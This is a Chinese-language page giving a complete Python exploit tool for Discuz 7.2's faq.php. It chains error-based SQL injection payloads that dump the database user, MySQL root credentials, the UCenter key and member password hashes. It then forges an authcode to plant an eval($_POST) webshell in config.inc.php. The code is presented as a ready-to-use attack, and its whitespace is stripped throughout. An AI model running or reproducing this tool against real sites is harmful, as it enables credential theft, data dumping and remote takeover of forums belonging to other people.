Python写的Discuz7.2版faq.php注入漏洞工具
Discuz7.2faq.php全自动利用工具,getshell以及dump数据,python版的uc_keygetshell部分的代码来自网上(感谢作者)
实现代码:
#!/usr/bin/envpython
#-*-coding:gbk-*-
#-*-coding:gb2312-*-
#-*-coding:utf_8-*-
#authoriswin
importsys
importhashlib
importtime
importmath
importbase64
importurllib2
importurllib
importre
defsendRequest(url,para):
try:
data=urllib.urlencode(para)
req=urllib2.Request(url,data)
res=urllib2.urlopen(req,timeout=20).read()
exceptException,e:
print'ExploitFailed!\n%s'%(e)
exit(0);
returnres
defgetTablePrefix(url):
print'StartGetTablePrefix...'
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':')and(select1from(selectcount(*),concat((selecthex(TABLE_NAME)fromINFORMATION_SCHEMA.TABLESwheretable_schema=database()limit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)#'}
res=sendRequest(url,para);
pre=re.findall("Duplicateentry'(.*?)'",res);
iflen(pre)==0:
print'ExploitFailed!'
exit(0);
table_pre=pre[0][:len(pre[0])-1].decode('hex')
table_pre=table_pre[0:table_pre.index('_')]
print'Table_pre:%s'%(table_pre)
returntable_pre
defgetCurrentUser(url):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':')and(select1from(selectcount(*),concat(user(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)#'}
res=sendRequest(url,para)
pre=re.findall("Duplicateentry'(.*?)'",res)
iflen(pre)==0:
print'ExploitFailed!'
exit(0);
table_pre=pre[0][:len(pre[0])-1]
print'CurrentUser:%s'%(table_pre)
returntable_pre
defgetUcKey(url):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':')and(select1from(selectcount(*),concat((selectsubstr(authkey,1,62)fromcdb_uc_applicationslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)#'}
para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':')and(select1from(selectcount(*),concat((selectsubstr(authkey,63,2)fromcdb_uc_applicationslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)#'}
res=sendRequest(url,para);
res1=sendRequest(url,para1);
key1=re.findall("Duplicateentry'(.*?)'",res)
key2=re.findall("Duplicateentry'(.*?)'",res1)
iflen(key1)==0:
print'GetUc_KeyFailed!'
return''
key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]
print'uc_key:%s'%(key)
returnkey
defgetRootUser(url):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':')and(select1from(selectcount(*),concat((selectconcat(user,0x20,password)frommysql.userlimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)#'}
res=sendRequest(url,para);
pre=re.findall("Duplicateentry'(.*?)'",res)
iflen(pre)==0:
print'ExploitFailed!'
exit(0);
table_pre=pre[0][:len(pre[0])-1].split('')
print'rootinfo:\nuser:%spassword:%s'%(table_pre[0],table_pre[1])
defdumpData(url,table_prefix,count):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':')and(select1from(selectcount(*),concat((selectconcat(username,0x20,password)from%s_memberslimit%d,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)#'%(table_prefix,count)}
res=sendRequest(url,para);
datas=re.findall("Duplicateentry'(.*?)'",res)
iflen(datas)==0:
print'ExploitFailed!'
exit(0)
cleandata=datas[0][:len(datas[0])-1]
info=cleandata.split('')
print'user:%spass:%s'%(info[0],info[1])
defmicrotime(get_as_float=False):
ifget_as_float:
returntime.time()
else:
return'%.8f%d'%math.modf(time.time())
defget_authcode(string,key=''):
ckey_length=4
key=hashlib.md5(key).hexdigest()
keya=hashlib.md5(key[0:16]).hexdigest()
keyb=hashlib.md5(key[16:32]).hexdigest()
keyc=(hashlib.md5(microtime()).hexdigest())[-ckey_length:]
cryptkey=keya+hashlib.md5(keya+keyc).hexdigest()
key_length=len(cryptkey)
string='0000000000'+(hashlib.md5(string+keyb)).hexdigest()[0:16]+string
string_length=len(string)
result=''
box=range(0,256)
rndkey=dict()
foriinrange(0,256):
rndkey[i]=ord(cryptkey[i%key_length])
j=0
foriinrange(0,256):
j=(j+box[i]+rndkey[i])%256
tmp=box[i]
box[i]=box[j]
box[j]=tmp
a=0
j=0
foriinrange(0,string_length):
a=(a+1)%256
j=(j+box[a])%256
tmp=box[a]
box[a]=box[j]
box[j]=tmp
result+=chr(ord(string[i])^(box[(box[a]+box[j])%256]))
returnkeyc+base64.b64encode(result).replace('=','')
defget_shell(url,key,host):
headers={'Accept-Language':'zh-cn',
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/4.0(compatible;MSIE6.00;WindowsNT5.1;SV1)',
'Referer':url
}
tm=time.time()+10*3600
tm="time=%d&action=updateapps"%tm
code=urllib.quote(get_authcode(tm,key))
url=url+"?code="+code
data1='''<?xmlversion="1.0"encoding="ISO-8859-1"?>
<root>
<itemid="UC_API">http://xxx\');eval($_POST[3]);//</item>
</root>'''
try:
req=urllib2.Request(url,data=data1,headers=headers)
ret=urllib2.urlopen(req)
except:
return"ExploitFalied"
data2='''<?xmlversion="1.0"encoding="ISO-8859-1"?>
<root>
<itemid="UC_API">http://aaa</item>
</root>'''
try:
req=urllib2.Request(url,data=data2,headers=headers)
ret=urllib2.urlopen(req)
except:
return"error"
try:
req=urllib2.Request(host+'/config.inc.php')
res=urllib2.urlopen(req,timeout=20).read()
exceptException,e:
print'GetWebshellFailed,%s'%(e)
return
print"webshell:"+host+"/config.inc.php,password:3"
if__name__=='__main__':
print'DZ7.xExpCodeByiswin'
iflen(sys.argv)<3:
print'DZ7.xExpCodeByiswin\nusage:pythondz7.pyhttps://www.nhooo.com10'
exit(0)
url=sys.argv[1]+'/faq.php'
count=int(sys.argv[2])
user=getCurrentUser(url)
ifuser.startswith('root@'):
getRootUser(url)
uc_key=getUcKey(url)
iflen(uc_key)==64:
print'StartGetWebshell...'
get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1])
tb_pre=getTablePrefix(url)
print'StartDumpData...'
forxinxrange(0,count):
dumpData(url,tb_pre,x)